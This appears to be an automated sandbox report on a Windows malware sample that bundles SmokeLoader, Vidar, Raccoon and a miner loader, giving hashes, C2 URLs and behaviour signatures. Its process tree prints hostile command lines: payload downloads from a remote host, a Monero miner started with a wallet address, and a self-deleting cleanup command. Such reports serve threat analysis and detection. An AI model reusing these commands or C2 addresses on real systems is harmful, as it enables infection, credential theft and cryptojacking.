Overview

overview

10

Static

static

614ae41db6...84.exe

windows7_x64

10

614ae41db6...84.exe

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    11/01/2022, 20:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    614ae41db644f93f9e99f41b07629884.exe

  • Size

    279KB

  • MD5

    614ae41db644f93f9e99f41b07629884

  • SHA1

    a1a80f51d64ec56bf909ec75f170554f2035b261

  • SHA256

    67b16577f8ea1ce165abf063882fb2e1c7d8c2229c9dfbd60c08b84b5a8f3f96

  • SHA512

    337c42cd1d78ad6096d43529f15633e70cc1a737d7d84e4d97b2eb7ddd13aeb5321b6fd6544575d0fde0d58de5d19ae7c77d8a9a9040350fd57fb5b654f7dba0

Score
10/10
arkeiloaderbotraccoonsmokeloadervidar1125backdoorcollectiondiscoveryloaderminerpersistencespywarestealersuricatatrojanupx

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://host-data-coin-11.com/

http://file-coin-host-12.com/

http://srtuiyhuali.at/

http://fufuiloirtu.com/

http://amogohuigotuli.at/

http://novohudosovu.com/

http://brutuilionust.com/

http://bubushkalioua.com/

http://dumuilistrati.at/

http://verboliatsiaeeees.com/
rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

vidar

Version

49.6

Botnet

1125

C2

https://noc.social/@banda5ker

https://mastodon.social/@banda6ker
Attributes
  • profile_id

    1125

Extracted

Family

raccoon

Version

1.8.4-hotfixs

rc4.plain

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

    stealerarkei
  • LoaderBot

    LoaderBot is a loader written in .NET downloading and executing miners.

    loaderminerloaderbot
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata
  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata
  • suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

    suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

    suricata
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata
  • Arkei Stealer Payload 2 IoCs
    stealer
  • LoaderBot executable 2 IoCs
  • Vidar Stealer 3 IoCs
    stealer
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 47 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 13 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies system certificate store 2 TTPs 3 IoCs
    evasionspywaretrojan
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\614ae41db644f93f9e99f41b07629884.exe
    "C:\Users\Admin\AppData\Local\Temp\614ae41db644f93f9e99f41b07629884.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1100
    • C:\Users\Admin\AppData\Local\Temp\614ae41db644f93f9e99f41b07629884.exe
      "C:\Users\Admin\AppData\Local\Temp\614ae41db644f93f9e99f41b07629884.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1840
  • C:\Users\Admin\AppData\Local\Temp\7455.exe
    C:\Users\Admin\AppData\Local\Temp\7455.exe
    1⤵
    • Executes dropped EXE
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:1480
  • C:\Users\Admin\AppData\Local\Temp\7F72.exe
    C:\Users\Admin\AppData\Local\Temp\7F72.exe
    1⤵
    • Executes dropped EXE
    PID:1380
  • C:\Users\Admin\AppData\Local\Temp\961E.exe
    C:\Users\Admin\AppData\Local\Temp\961E.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1076
    • C:\Users\Admin\AppData\Local\Temp\961E.exe
      C:\Users\Admin\AppData\Local\Temp\961E.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2000
  • C:\Users\Admin\AppData\Local\Temp\FADA.exe
    C:\Users\Admin\AppData\Local\Temp\FADA.exe
    1⤵
    • Executes dropped EXE
    PID:1600
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 436
      2⤵
      • Loads dropped DLL
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:276
  • C:\Users\Admin\AppData\Local\Temp\B82.exe
    C:\Users\Admin\AppData\Local\Temp\B82.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1720
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:924
  • C:\Users\Admin\AppData\Local\Temp\FE6.exe
    C:\Users\Admin\AppData\Local\Temp\FE6.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    PID:1920
  • C:\Users\Admin\AppData\Local\Temp\1EF4.exe
    C:\Users\Admin\AppData\Local\Temp\1EF4.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:604
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2156.tmp\2157.tmp\2168.bat C:\Users\Admin\AppData\Local\Temp\1EF4.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1660
      • C:\Users\Admin\AppData\Local\Temp\2156.tmp\2157.tmp\extd.exe
        C:\Users\Admin\AppData\Local\Temp\2156.tmp\2157.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        PID:608
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12230\123.vbs"
        3⤵
        • Blocklisted process makes network request
        PID:276
      • C:\Users\Admin\AppData\Local\Temp\2156.tmp\2157.tmp\extd.exe
        C:\Users\Admin\AppData\Local\Temp\2156.tmp\2157.tmp\extd.exe "/download" "http://a0620531.xsph.ru/htrrfwedsqw.exe" "setup_c.exe" "" "" "" "" "" ""
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        PID:1596
      • C:\Users\Admin\AppData\Local\Temp\12230\setup_c.exe
        setup_c.exe
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        PID:1484
      • C:\Users\Admin\AppData\Local\Temp\2156.tmp\2157.tmp\extd.exe
        C:\Users\Admin\AppData\Local\Temp\2156.tmp\2157.tmp\extd.exe "/download" "http://a0620531.xsph.ru/c_setup.exe" "setup_m.exe" "" "" "" "" "" ""
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        PID:1136
      • C:\Users\Admin\AppData\Local\Temp\2156.tmp\2157.tmp\extd.exe
        C:\Users\Admin\AppData\Local\Temp\2156.tmp\2157.tmp\extd.exe "/download" "http://a0620531.xsph.ru/RMR.exe" "setup_s.exe" "" "" "" "" "" ""
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        PID:1584
      • C:\Users\Admin\AppData\Local\Temp\12230\setup_m.exe
        setup_m.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of AdjustPrivilegeToken
        PID:584
      • C:\Users\Admin\AppData\Local\Temp\2156.tmp\2157.tmp\extd.exe
        C:\Users\Admin\AppData\Local\Temp\2156.tmp\2157.tmp\extd.exe "" "" "" "" "" "" "" "" ""
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        PID:2008
      • C:\Users\Admin\AppData\Local\Temp\12230\setup_s.exe
        setup_s.exe
        3⤵
        • Executes dropped EXE
        • Drops startup file
        • Loads dropped DLL
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of AdjustPrivilegeToken
        PID:1100
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:1380
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:1076
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:1596
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:1976
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:1164
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:984
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:936
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:1732
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:1488
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:1200
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:1808
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:936
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:1008
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:1204
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:876
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:1748
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:656
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:1732
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:1984
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:1848
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:1536
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:1760
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:1968
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:1920
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:1636
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:1988
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:920
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:2008
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
          4⤵
          • Executes dropped EXE
          PID:1972
  • C:\Users\Admin\AppData\Local\Temp\2D09.exe
    C:\Users\Admin\AppData\Local\Temp\2D09.exe
    1⤵
    • Executes dropped EXE
    PID:1704
  • C:\Users\Admin\AppData\Local\Temp\3ED5.exe
    C:\Users\Admin\AppData\Local\Temp\3ED5.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Checks processor information in registry
    • Modifies system certificate store
    PID:1576
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im 3ED5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\3ED5.exe" & del C:\ProgramData\*.dll & exit
      2⤵
        PID:1848
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /im 3ED5.exe /f
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:876
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 6
          3⤵
          • Delays execution with timeout.exe
          PID:2008
    • C:\Windows\SysWOW64\explorer.exe
      C:\Windows\SysWOW64\explorer.exe
      1⤵
      • Accesses Microsoft Outlook profiles
      • outlook_office_path
      • outlook_win_path
      PID:696
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe
      1⤵
        PID:1592

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/276-320-0x0000000001D30000-0x00000000044F5000-memory.dmp

        Filesize

        39.8MB

        Download

      • memory/584-178-0x0000000073780000-0x0000000073797000-memory.dmp

        Filesize

        92KB

        Download

      • memory/584-197-0x0000000074F70000-0x0000000074FA5000-memory.dmp

        Filesize

        212KB

        Download

      • memory/584-162-0x0000000000760000-0x00000000007A5000-memory.dmp

        Filesize

        276KB

        Download

      • memory/584-192-0x000000006DE30000-0x000000006DE82000-memory.dmp

        Filesize

        328KB

        Download

      • memory/584-191-0x0000000073510000-0x0000000073525000-memory.dmp

        Filesize

        84KB

        Download

      • memory/584-163-0x0000000000090000-0x0000000000091000-memory.dmp

        Filesize

        4KB

        Download

      • memory/584-188-0x0000000004D80000-0x0000000004D81000-memory.dmp

        Filesize

        4KB

        Download

      • memory/584-177-0x0000000075420000-0x000000007606A000-memory.dmp

        Filesize

        12.3MB

        Download

      • memory/584-176-0x00000000747B0000-0x0000000074830000-memory.dmp

        Filesize

        512KB

        Download

      • memory/584-175-0x00000000766C0000-0x000000007674F000-memory.dmp

        Filesize

        572KB

        Download

      • memory/584-174-0x0000000000EC0000-0x0000000000F22000-memory.dmp

        Filesize

        392KB

        Download

      • memory/584-173-0x0000000000EC0000-0x0000000000F22000-memory.dmp

        Filesize

        392KB

        Download

      • memory/584-172-0x0000000074BD0000-0x0000000074D2C000-memory.dmp

        Filesize

        1.4MB

        Download

      • memory/584-170-0x0000000076660000-0x00000000766B7000-memory.dmp

        Filesize

        348KB

        Download

      • memory/584-169-0x0000000074D30000-0x0000000074D77000-memory.dmp

        Filesize

        284KB

        Download

      • memory/584-161-0x00000000749B0000-0x00000000749FA000-memory.dmp

        Filesize

        296KB

        Download

      • memory/584-168-0x0000000076780000-0x000000007682C000-memory.dmp

        Filesize

        688KB

        Download

      • memory/584-166-0x0000000000EC0000-0x0000000000F22000-memory.dmp

        Filesize

        392KB

        Download

      • memory/696-229-0x0000000000080000-0x00000000000EB000-memory.dmp

        Filesize

        428KB

        Download

      • memory/696-228-0x0000000000190000-0x0000000000204000-memory.dmp

        Filesize

        464KB

        Download

      • memory/924-109-0x0000000000090000-0x00000000000B0000-memory.dmp

        Filesize

        128KB

        Download

      • memory/924-118-0x0000000001370000-0x0000000001371000-memory.dmp

        Filesize

        4KB

        Download

      • memory/924-97-0x0000000000090000-0x00000000000B0000-memory.dmp

        Filesize

        128KB

        Download

      • memory/924-107-0x0000000000090000-0x00000000000B0000-memory.dmp

        Filesize

        128KB

        Download

      • memory/924-104-0x0000000000090000-0x00000000000B0000-memory.dmp

        Filesize

        128KB

        Download

      • memory/924-103-0x0000000000090000-0x00000000000B0000-memory.dmp

        Filesize

        128KB

        Download

      • memory/1076-69-0x0000000000830000-0x00000000008BA000-memory.dmp

        Filesize

        552KB

        Download

      • memory/1076-74-0x00000000046E0000-0x00000000046E1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1076-75-0x0000000000320000-0x0000000000321000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1076-68-0x0000000000830000-0x00000000008BA000-memory.dmp

        Filesize

        552KB

        Download

      • memory/1100-222-0x0000000000D90000-0x00000000011EB000-memory.dmp

        Filesize

        4.4MB

        Download

      • memory/1100-223-0x0000000000D90000-0x00000000011EB000-memory.dmp

        Filesize

        4.4MB

        Download

      • memory/1100-206-0x00000000749B0000-0x00000000749FA000-memory.dmp

        Filesize

        296KB

        Download

      • memory/1100-210-0x0000000000140000-0x0000000000185000-memory.dmp

        Filesize

        276KB

        Download

      • memory/1100-324-0x0000000004E50000-0x0000000004E51000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1100-59-0x0000000000230000-0x0000000000239000-memory.dmp

        Filesize

        36KB

        Download

      • memory/1100-58-0x0000000000220000-0x0000000000229000-memory.dmp

        Filesize

        36KB

        Download

      • memory/1380-77-0x0000000000240000-0x000000000025C000-memory.dmp

        Filesize

        112KB

        Download

      • memory/1380-78-0x0000000000400000-0x0000000000455000-memory.dmp

        Filesize

        340KB

        Download

      • memory/1380-76-0x0000000000220000-0x0000000000231000-memory.dmp

        Filesize

        68KB

        Download

      • memory/1420-60-0x00000000021E0000-0x00000000021F6000-memory.dmp

        Filesize

        88KB

        Download

      • memory/1420-80-0x0000000003E90000-0x0000000003EA6000-memory.dmp

        Filesize

        88KB

        Download

      • memory/1480-73-0x0000000000400000-0x0000000000452000-memory.dmp
